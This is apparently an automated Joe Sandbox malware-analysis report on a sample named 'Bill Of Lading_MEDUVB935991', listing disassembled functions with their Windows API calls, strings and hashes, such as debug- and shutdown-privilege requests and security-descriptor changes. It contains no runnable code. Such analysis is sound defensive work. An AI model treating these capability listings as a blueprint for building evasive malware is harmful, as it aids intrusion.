                                                                                                                      • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                      • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                      • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                      • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 1312810259-2896544425
                                                                                                                      • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                      • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                      • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                      • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                      • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcscpy.LIBCMT ref: 004038C7
                                                                                                                      • _wcscat.LIBCMT ref: 004038DC
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                        • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                        • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                      • _wcscpy.LIBCMT ref: 004039C2
                                                                                                                      • _wcslen.LIBCMT ref: 00403A53
                                                                                                                      • _wcslen.LIBCMT ref: 00403AAA
                                                                                                                      Strings
                                                                                                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                      • _, xrefs: 00403B48
                                                                                                                      • Error opening the file, xrefs: 0042B8AC
                                                                                                                      • Unterminated string, xrefs: 0042B9BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                      • API String ID: 4115725249-188983378
                                                                                                                      • Opcode ID: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                                                                                                      • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                      • Opcode Fuzzy Hash: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                                                                                                      • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                      • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                      • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                      • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                      • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Timetime$Sleep
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 4176159691-3405671355
                                                                                                                      • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                      • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                      • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                      • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,74DE8FB0,74DE8FB0,?,?,00000000), ref: 00442E40
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                                                        • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                      • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                      • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                                                      • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                      • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                        • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                        • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                        • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                      • _memset.LIBCMT ref: 00445E61
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                      • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                      • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                      • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3490752873-0
                                                                                                                      • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                      • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                      • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                      • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                      APIs
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                      • _memset.LIBCMT ref: 0047AB7C
                                                                                                                      • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                      • _memset.LIBCMT ref: 0047ACCD
                                                                                                                      • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                      • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1588287285-2785691316
                                                                                                                      • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                      • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                      • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                      • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                      • GetLastError.KERNEL32 ref: 00436504
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                      • API String ID: 2938487562-3733053543
                                                                                                                      • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                      • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                      • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                      • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 00436162
                                                                                                                      • __swprintf.LIBCMT ref: 00436176
                                                                                                                        • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                      • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2406429042-0
                                                                                                                      • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                      • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                      • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                      • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                      • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                      • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                      • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                      • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                      • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                      APIs
                                                                                                                      • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                        • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • _wcslen.LIBCMT ref: 0047AE18
                                                                                                                      • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                      • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 1915432386-2761332787
                                                                                                                      • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                      • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                      • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                      • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DEFINE$`$h$h
                                                                                                                      • API String ID: 0-4194577831
                                                                                                                      • Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                                                                      • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                      • Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
